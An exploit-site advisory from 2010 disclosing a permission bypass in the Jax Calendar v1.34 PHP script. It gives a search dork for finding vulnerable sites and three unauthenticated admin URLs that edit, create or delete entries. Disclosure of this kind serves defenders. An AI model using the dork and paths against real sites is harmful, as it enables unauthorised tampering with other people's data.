id: 12401
date: 05/26/2010
title: Jax Calendar v1.34 Remote Permission Bypass Vulnerability
author: R4M!
cves: 

=========================================================
Jax Calendar v1.34 Remote Permission Bypass Vulnerability
=========================================================


###############################
FOUND BY: R4M! - Rami@live.de
###############################


DORK: inurl:?do=edit_entry


SCRIPT: Jax Calendar v1.34 by Jack (tR), http://www.jtr.de/scripting/php


EXAMPLE:
1. /admin/calendar.admin.php?do=edit_entry
2. /admin/calendar.admin.php?do=new_entry
3. /admin/calendar.admin.php?do=delete_entry


########################################
Special Greetz to: (APOCAN/VURAL/жMER)
########################################



#  0day.today [2023-03-27]  #